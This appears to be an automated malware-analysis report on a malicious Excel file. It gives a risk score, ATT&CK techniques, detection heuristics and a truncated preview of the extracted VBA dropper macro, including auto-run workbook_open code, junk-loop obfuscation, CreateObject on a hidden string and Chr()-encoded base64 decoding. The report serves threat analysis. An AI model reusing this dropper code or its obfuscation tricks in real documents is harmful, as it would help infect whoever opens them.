MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes a Shell() call and CreateObject, indicating it's designed to execute external code. The presence of a long encoded blob and the ClamAV detection name 'Doc.Dropper.Agent-7079636-0' strongly suggest this macro is a dropper for a second-stage payload. No specific family could be identified due to the obfuscation.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-7079636-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7079636-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14283 bytes |
SHA-256: 160a36a17ac66b6d514bbd2331d230f7cc34ee563a448897f436f52fa8997ff0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
atP_h6I16O.tzxGQcCNrimkdtuoZsW3
While 18 = 1759
Dim ETG_w5UEGreP3Di6ajyDSFEBY7q86jP7IUkXqw As Variant
Wend
Dim SVF7F_CUrYJx As Integer
While 1 = 7766
Dim My3Si9MEjzLWHgagFgbJMmPb6U9E8CMQwFUZDyv As Variant
Wend
Dim lIkKcIswiheN As Integer
While 4 = 448
Dim J79jjhZVL9GGgk4iBJ_cPtz_lZvRLhYgawCTw As Variant
Wend
Dim et2mbhlAbn As Integer
While 11 = 1159
Dim NHtWhB8YF88IuGImhjotgiveYFywKL8Hu4CCxB8YxmMxfjE As Variant
Wend
Dim eQ5CZw4SnVM7ZKJ As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "atP_h6I16O"
Dim JeiOQ1rr3yHZ6byIwt8tBuZ_sZJj438UZY9CR96_KKyo7x_JPMX7g6kY_ie1pGx91v_fbvzxw8gy5tB4T9Rod_xdwh As String
Function M39yW1DEyfkN54U78y_SdOHgT1iXpiDgMmYSxqLNaKEfxg8YRXNG(hT6sBHyBQfcNqVUjpbpOupZA_fBh_mXDB9zo7d6F_byqREp2GCJh3NN145seFOBmFXKrfpm)
While 26 = 5820
Dim xRHpDyg1n84rZkR211ZKCCevsfDC9dLnjEKt_Jxo As Variant
Wend
Dim G1LGmuDahitNwKj As Integer
While 17 = 2608
Dim twV6ftc2IuOFSXg1pCtCJzVG7alcXt71Xda7mMP5m8CVWnsB_qCK As Variant
Wend
Dim BGX4ZM8DF9cXwWr As Integer
While 21 = 6825
Dim y7jMauyYLv9tRrjcppuyP_geXNLwndni9 As Variant
Wend
Dim YcjYKqKFZboU As Integer
Dim HED1IvdhjRV_uE7a3qv8HwqwVe5a7EQxnxU5RCndaog_YA4N9OyeFMvUWOcn1Bjd_
Dim nPUC4NYyE2fk9xxg_4W6AjXJOXoyfr1teBV5yQ6MHRwAoT7rrM4K
While 10 = 6686
Dim fevqAhasXDxLhBuqGYuVweDLETlh2Z_5izPGr6 As Variant
Wend
Dim gYcIoTnW1I6d8A As Integer
While 1 = 2221
Dim qQgAahkp531893mqul9K1T3myshrbbkWaC As Variant
Wend
Dim MPRNpIT1djRq As Integer
While 2 = 8078
Dim TutIWRdvHUX3Jr92LaPcf5nUWe5yz_zQTGWw8RDQ2n412XD8I As Variant
Wend
Dim anBSxIXEWv2W As Integer
While 24 = 5645
Dim o6HeEhCSK44V8j2Awc8a7nXTx8e78pieK4KrtUuzAm8gtnTMQVR3wZYAg As Variant
Wend
Dim wpGB_TdSWJCXIPZ As Integer
While 25 = 3456
Dim rGYRpzjIlQokWorudJI7nlw5RcLUbPyGE As Variant
Wend
Dim Jn_FSpKfdtYsEmn As Integer
While 25 = 2695
Dim YhL9Rv_Td_KmNpUbfdedCtVzctFFBehVhpCqkHvD_SeEFC7zHQ As Variant
Wend
Dim NjHjnJVdho8Q As Integer
Set nPUC4NYyE2fk9xxg_4W6AjXJOXoyfr1teBV5yQ6MHRwAoT7rrM4K = CreateObject(JeiOQ1rr3yHZ6byIwt8tBuZ_sZJj438UZY9CR96_KKyo7x_JPMX7g6kY_ie1pGx91v_fbvzxw8gy5tB4T9Rod_xdwh)
While 13 = 5379
Dim ZyDglmzVqaXsNOrZvO7tkSvY_WfNnMXFBeoQ8YLeZeg As Variant
Wend
Dim Hs1Y4mCuX_fV As Integer
While 27 = 5984
Dim ECnaNFkrbBQprjZbVCaSEvmoL8kjja9FeHhNS78XxvDEaJpSL As Variant
Wend
Dim jXUhLOSX8MOdAGA As Integer
While 26 = 7948
Dim BJJiAKGXDBdRrgLBQPV9CmgQ2MyTsq3wnCCP_EQAb9Peq7k1uK8MmG7 As Variant
Wend
Dim Wl2qvUvoUHqnnc As Integer
sb_RDWyxJxgqdVjIhWvcSgkeqxGd18ds4yFTrobZE61_wPxQ4yOEA_lJ1hjNOT6KRxwoNNZ24TWVperY_yjAqXqyK6bHDMIt9nu8cHCnXVJ = Chr(326 - 228) & Chr(497 - 392) & Chr(371 - 261) & Chr(226 - 180) & Chr(150 - 52) & Chr(128 - 31) & Chr(221 - 106) & Chr(480 - 379) & Chr(364 - 310) & Chr(372 - 320)
While 8 = 5463
Dim AJ8UfDVBj5l7igsoHe_nnGXdnoS4V_Q6WyIvNPk2AiPvIWLGlb As Variant
Wend
Dim gGhxP3ubpztboil As Integer
While 26 = 121
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.